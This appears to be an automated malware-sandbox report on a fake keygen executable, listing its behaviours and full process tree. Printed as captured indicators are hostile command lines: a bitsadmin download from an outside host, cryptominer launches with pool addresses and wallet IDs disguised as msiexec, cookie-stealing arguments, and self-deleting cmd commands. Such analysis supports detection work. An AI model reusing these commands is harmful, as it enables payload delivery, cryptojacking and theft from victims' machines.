300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	filee.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXE

pid	Process
4492	PING.EXE
3964	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rundll32.exesvchost.exeultramediaburner.tmpDaezholypuda.exe

pid	Process
2664	rundll32.exe
2664	rundll32.exe
3216	svchost.exe
3216	svchost.exe
4148	ultramediaburner.tmp
4148	ultramediaburner.tmp
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe
4320	Daezholypuda.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rundll32.exesvchost.exeJoSetp.exeUltra.exesvchost.exeBahykaejewi.exeDaezholypuda.exesvchost.exe

description	pid	Process
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeTcbPrivilege	3216	svchost.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2684	JoSetp.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	2664	rundll32.exe
Token: SeDebugPrivilege	3776	Ultra.exe
Token: SeAuditPrivilege	2472	svchost.exe
Token: SeDebugPrivilege	4260	Bahykaejewi.exe
Token: SeDebugPrivilege	4320	Daezholypuda.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe
Token: SeSystemEnvironmentPrivilege	2616	svchost.exe
Token: SeUndockPrivilege	2616	svchost.exe
Token: SeManageVolumePrivilege	2616	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe
Token: SeSystemEnvironmentPrivilege	2616	svchost.exe
Token: SeUndockPrivilege	2616	svchost.exe
Token: SeManageVolumePrivilege	2616	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe
Token: SeSystemEnvironmentPrivilege	2616	svchost.exe
Token: SeUndockPrivilege	2616	svchost.exe
Token: SeManageVolumePrivilege	2616	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2616	svchost.exe
Token: SeIncreaseQuotaPrivilege	2616	svchost.exe
Token: SeSecurityPrivilege	2616	svchost.exe
Token: SeTakeOwnershipPrivilege	2616	svchost.exe
Token: SeLoadDriverPrivilege	2616	svchost.exe
Token: SeSystemtimePrivilege	2616	svchost.exe
Token: SeBackupPrivilege	2616	svchost.exe
Token: SeRestorePrivilege	2616	svchost.exe
Token: SeShutdownPrivilege	2616	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

ultramediaburner.tmp

pid	Process
4148	ultramediaburner.tmp

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

xiuhuali.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	Process
1460	xiuhuali.exe
1460	xiuhuali.exe
4776	MicrosoftEdge.exe
4980	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 57 IoCs

Processes:

keygen-step-4 — копия.exexiuhuali.exerundll32.exesvchost.exeInstall.exeInstall.tmpUltra.exeultramediaburner.exeultramediaburner.tmpDaezholypuda.execmd.exefilee.exe

description	pid	Process	procid_target
PID 4048 wrote to memory of 1460	4048	keygen-step-4 — копия.exe	73
PID 4048 wrote to memory of 1460	4048	keygen-step-4 — копия.exe	73
PID 4048 wrote to memory of 1460	4048	keygen-step-4 — копия.exe	73
PID 1460 wrote to memory of 2664	1460	xiuhuali.exe	76
PID 1460 wrote to memory of 2664	1460	xiuhuali.exe	76
PID 1460 wrote to memory of 2664	1460	xiuhuali.exe	76
PID 4048 wrote to memory of 2684	4048	keygen-step-4 — копия.exe	77
PID 4048 wrote to memory of 2684	4048	keygen-step-4 — копия.exe	77
PID 2664 wrote to memory of 3216	2664	rundll32.exe	70
PID 2664 wrote to memory of 2864	2664	rundll32.exe	11
PID 3216 wrote to memory of 196	3216	svchost.exe	78
PID 3216 wrote to memory of 196	3216	svchost.exe	78
PID 3216 wrote to memory of 196	3216	svchost.exe	78
PID 2664 wrote to memory of 352	2664	rundll32.exe	52
PID 2664 wrote to memory of 2456	2664	rundll32.exe	20
PID 2664 wrote to memory of 2472	2664	rundll32.exe	18
PID 2664 wrote to memory of 1104	2664	rundll32.exe	47
PID 2664 wrote to memory of 928	2664	rundll32.exe	50
PID 2664 wrote to memory of 1352	2664	rundll32.exe	41
PID 2664 wrote to memory of 1852	2664	rundll32.exe	30
PID 2664 wrote to memory of 1228	2664	rundll32.exe	44
PID 2664 wrote to memory of 1276	2664	rundll32.exe	42
PID 2664 wrote to memory of 2616	2664	rundll32.exe	13
PID 2664 wrote to memory of 2644	2664	rundll32.exe	12
PID 4048 wrote to memory of 2632	4048	keygen-step-4 — копия.exe	82
PID 4048 wrote to memory of 2632	4048	keygen-step-4 — копия.exe	82
PID 4048 wrote to memory of 2632	4048	keygen-step-4 — копия.exe	82
PID 2632 wrote to memory of 3712	2632	Install.exe	83
PID 2632 wrote to memory of 3712	2632	Install.exe	83
PID 2632 wrote to memory of 3712	2632	Install.exe	83
PID 3712 wrote to memory of 3776	3712	Install.tmp	84
PID 3712 wrote to memory of 3776	3712	Install.tmp	84
PID 3776 wrote to memory of 2060	3776	Ultra.exe	86
PID 3776 wrote to memory of 2060	3776	Ultra.exe	86
PID 3776 wrote to memory of 2060	3776	Ultra.exe	86
PID 2060 wrote to memory of 4148	2060	ultramediaburner.exe	88
PID 2060 wrote to memory of 4148	2060	ultramediaburner.exe	88
PID 2060 wrote to memory of 4148	2060	ultramediaburner.exe	88
PID 4148 wrote to memory of 4224	4148	ultramediaburner.tmp	89
PID 4148 wrote to memory of 4224	4148	ultramediaburner.tmp	89
PID 3776 wrote to memory of 4260	3776	Ultra.exe	90
PID 3776 wrote to memory of 4260	3776	Ultra.exe	90
PID 3776 wrote to memory of 4320	3776	Ultra.exe	91
PID 3776 wrote to memory of 4320	3776	Ultra.exe	91
PID 4048 wrote to memory of 4440	4048	keygen-step-4 — копия.exe	92
PID 4048 wrote to memory of 4440	4048	keygen-step-4 — копия.exe	92
PID 4048 wrote to memory of 4440	4048	keygen-step-4 — копия.exe	92
PID 4320 wrote to memory of 4204	4320	Daezholypuda.exe	96
PID 4320 wrote to memory of 4204	4320	Daezholypuda.exe	96
PID 4204 wrote to memory of 4400	4204	cmd.exe	143
PID 4204 wrote to memory of 4400	4204	cmd.exe	143
PID 4204 wrote to memory of 4400	4204	cmd.exe	143
PID 4440 wrote to memory of 4304	4440	filee.exe	100
PID 4440 wrote to memory of 4304	4440	filee.exe	100
PID 4440 wrote to memory of 4304	4440	filee.exe	100
PID 4440 wrote to memory of 4920	4440	filee.exe	102
PID 4440 wrote to memory of 4920	4440	filee.exe	102

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:928

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:352

C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4048
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2664
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Users\Admin\AppData\Local\Temp\is-QU9HH.tmp\Install.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-QU9HH.tmp\Install.tmp" /SL5="$501E0,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3712
  - - C:\Users\Admin\AppData\Local\Temp\is-MRE0H.tmp\Ultra.exe
      "C:\Users\Admin\AppData\Local\Temp\is-MRE0H.tmp\Ultra.exe" /S /UID=burnerch1
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3776
    - - C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe
        
        "C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2060
      - C:\Users\Admin\AppData\Local\Temp\is-KGJ8S.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KGJ8S.tmp\ultramediaburner.tmp" /SL5="$301F4,281924,62464,C:\Program Files\Common Files\KPJAZEFTIK\ultramediaburner.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4148
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        7⤵
        Executes dropped EXE
        
        PID:4224
    - - C:\Users\Admin\AppData\Local\Temp\74-ce3fb-72b-9f3b1-b5dfbb0baa0b6\Bahykaejewi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\74-ce3fb-72b-9f3b1-b5dfbb0baa0b6\Bahykaejewi.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
    - - C:\Users\Admin\AppData\Local\Temp\9b-4c092-d28-1579a-56449aae63f1f\Daezholypuda.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9b-4c092-d28-1579a-56449aae63f1f\Daezholypuda.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4320
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jyrjqo4.mc2\instEU.exe & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4204
        
        C:\Users\Admin\AppData\Local\Temp\3jyrjqo4.mc2\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\3jyrjqo4.mc2\instEU.exe
        7⤵
        
        PID:4400
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ldtf5e14.g1j\google-game.exe & exit
        6⤵
        
        PID:4772
        
        C:\Users\Admin\AppData\Local\Temp\ldtf5e14.g1j\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\ldtf5e14.g1j\google-game.exe
        7⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        8⤵
        
        PID:4588
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g41gored.ikb\md1_1eaf.exe & exit
        6⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\g41gored.ikb\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\g41gored.ikb\md1_1eaf.exe
        7⤵
        
        PID:5572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe & exit
        6⤵
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe
        7⤵
        
        PID:6100
        
        C:\Users\Admin\AppData\Local\Temp\cYtXI8Dsuy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cYtXI8Dsuy.exe"
        8⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Roaming\1619344066289.exe
        
        "C:\Users\Admin\AppData\Roaming\1619344066289.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619344066289.txt"
        9⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\cYtXI8Dsuy.exe"
        9⤵
        
        PID:4444
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        10⤵
        Runs ping.exe
        
        PID:3964
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\nahpjdgh.g4e\y1.exe"
        8⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        9⤵
        Delays execution with timeout.exe
        
        PID:3200
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ouutvwq.20q\askinstall39.exe & exit
        6⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\0ouutvwq.20q\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\0ouutvwq.20q\askinstall39.exe
        7⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:2308
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2mm44s3.qn3\inst.exe & exit
        6⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\y2mm44s3.qn3\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\y2mm44s3.qn3\inst.exe
        7⤵
        
        PID:5860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyifdtw5.umb\SunLabsPlayer.exe /S & exit
        6⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\vyifdtw5.umb\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vyifdtw5.umb\SunLabsPlayer.exe /S
        7⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:4128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Executes dropped EXE
        
        PID:4400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:6072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:3420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:4840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsgAEC6.tmp\tempfile.ps1"
        8⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        8⤵
        Download via BitsAdmin
        
        PID:2840
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evdek54n.1rv\GcleanerWW.exe /mixone & exit
        6⤵
        
        PID:4444
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe & exit
        6⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        7⤵
        
        PID:5876
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\tzhewvwu.tqm\toolspab1.exe
        8⤵
        
        PID:5052
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ysu2ongp.x1j\c7ae36fa.exe & exit
        6⤵
        
        PID:6040
        
        C:\Users\Admin\AppData\Local\Temp\ysu2ongp.x1j\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\ysu2ongp.x1j\c7ae36fa.exe
        7⤵
        
        PID:5476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe /8-2222 & exit
        6⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe /8-2222
        7⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cmdiyand.ijl\app.exe" /8-2222
        8⤵
        
        PID:2100
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe
    "C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:4304
  - - C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe
      "C:\Users\Admin\AppData\Roaming\6DE2.tmp.exe"
      4⤵
      PID:4144
- - C:\Users\Admin\AppData\Roaming\7016.tmp.exe
    "C:\Users\Admin\AppData\Roaming\7016.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:4920
  - - C:\Windows\system32\msiexec.exe
      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w29147@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
      4⤵
      PID:4988
  - - C:\Windows\system32\msiexec.exe
      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w11353 --cpu-max-threads-hint 50 -r 9999
      4⤵
      PID:5152
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
    3⤵
    PID:4560
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4492
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
  2⤵
  PID:5792
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
  2⤵
  PID:496
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5992
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:5684

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3216
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4776

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4824

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
